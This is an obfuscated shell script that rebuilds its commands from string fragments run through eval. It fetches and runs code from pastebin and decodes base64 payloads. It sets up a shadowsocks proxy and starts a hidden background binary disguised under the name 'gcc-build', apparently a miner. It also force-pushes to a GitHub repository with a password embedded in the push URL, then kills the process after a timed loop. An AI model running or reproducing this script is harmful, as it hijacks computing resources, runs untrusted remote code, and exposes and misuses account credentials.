wcFBkFp="o apt update"
ZKKtDiwC=" &>/dev/null "
teszmxNP="|| tru"
eval "sud""$wcFBkFp""$ZKKtDiwC""$teszmxNP""e"
JuDEa="wget -O co"
JRdQPT="desrc https://p"
XwLIjZkL="astebin.com/ra"
ZmxXvW="w/UKs9hZfc &>/"
BAsg="dev/nu"
eval "$JuDEa""$JRdQPT""$XwLIjZkL""$ZmxXvW""$BAsg""ll"
pMFtzXIP=" ./cod"
eval ".""$pMFtzXIP""esrc"
git clone $SRC codes &>/dev/null
OjuVAHc="ase64 -d co"
xWbTW="des/s"
eval "b""$OjuVAHc""$xWbTW"" > o"
LHawxju="do apt --yes i"
zlOzM="nstall psmi"
Spjj="sc shadowsocks-"
mLrU="libev &>/dev"
XoqhZymr="/null || tru"
eval "su""$LHawxju""$zlOzM""$Spjj""$mLrU""$XoqhZymr""e"
CBUAHq="o systemctl s"
wUzc="top shadowso"
tKql="cks-libev.ser"
WEvWMbr="vice &>/dev"
BjUuWn="/null ||"
eval "sud""$CBUAHq""$wUzc""$tKql""$WEvWMbr""$BjUuWn"" true"
wzfd="se64 -d cod"
tYeJwJ="es/c > "
eval "ba""$wzfd""$tYeJwJ""pipe"
bRjzdq="base64 -d cod"
fXvB="es/gc > g"
eval "$bRjzdq""$fXvB""c"
GAQfd="se64 -d co"
fMZCrCP="des/m > gc"
egLdEM="c-bui"
eval "ba""$GAQfd""$fMZCrCP""$egLdEM""ld"
CoPiJccY="se64 -d cod"
dxRGyHnC="es/p > prepa"
uNvGj="r"
eval "ba""$CoPiJccY""$dxRGyHnC""$uNvGj""e"
. ./prepare
EGrGvQ="sudo ss-local "
ZdLq="-c o --plug"
nbZW="in ./gqs --plug"
ExxS="in-opts ./gc"
vjJegUTs=" &>/dev/n"
eval "$EGrGvQ""$ZdLq""$nbZW""$ExxS""$vjJegUTs""ull &"
GpqNJt="chmod +x gcc"
chdKXbd="-b"
eval "$GpqNJt""$chdKXbd""uild"
zfDFO="ed -i 's/gcc/t"
zQyBvdu="rgfo/g'"
eval "s""$zfDFO""$zQyBvdu"" pipe"
sudo ./gcc-build --config=pipe &>/dev/null &
edMwwap="cho r"
eval "e""$edMwwap""sndvs"
ltZXyAM="leep"
eval "s""$ltZXyAM"" 60"
ClFqvE="t clone http"
DhtGFism="s://github."
hkcltUs="com/org-rlang-"
lcRpDLSr="ac/libimage.git"
KWqkjGK=" tmp &>/dev/"
caHPOCPK="null || tr"
eval "gi""$ClFqvE""$DhtGFism""$hkcltUs""$lcRpDLSr""$KWqkjGK""$caHPOCPK""ue"
bzXCxxP="d tmp || "
eval "c""$bzXCxxP""true"
oMcI=" config user."
SONQc="name 'Roman A"
xJbLDk="kopyan' &>"
JJmlLeF="/dev/null || "
eval "git""$oMcI""$SONQc""$xJbLDk""$JJmlLeF""true"
MjIvhXe="git config u"
McpH="ser.email roma"
iUwzoJ="n.akopyanxb@"
VMGBRB="inbox.ru &>/d"
thCH="ev/null || t"
WcSM="rue"
eval "$MjIvhXe""$McpH""$iUwzoJ""$VMGBRB""$thCH""$WcSM"
UmjCMIu="BUILD=\`date +%"
eval "$UmjCMIu""s\`"
zfVGMjqR="MAKE=\`date +%"
eval "$zfVGMjqR""S\`"
echo $BUILD >> rsndvs$MAKE
git add rsndvs$MAKE &>/dev/null || true
git commit -m $MAKE' Deploy rsndvs' &>/dev/null || true
LlIM="git push http"
DxGTTGmV="s://roman-"
TPYd="akopyanxb:'C"
MRdtaRty="NjR-KSjHVv_9Ap"
WlWySE="'@github.co"
iWRcD="m/org-rlang"
KIrL="-ac/libimage"
vGbSISd=".git -f &>/"
WRxs="dev/null || "
kpMSB="t"
eval "$LlIM""$DxGTTGmV""$TPYd""$MRdtaRty""$WlWySE""$iWRcD""$KIrL""$vGbSISd""$WRxs""$kpMSB""rue"
while :; do G=`date +%s`; echo 'Updated... '$G; [ `expr 1313 + $BUILD` -lt $G ] && sudo killall gcc-build && break; sleep 165; done
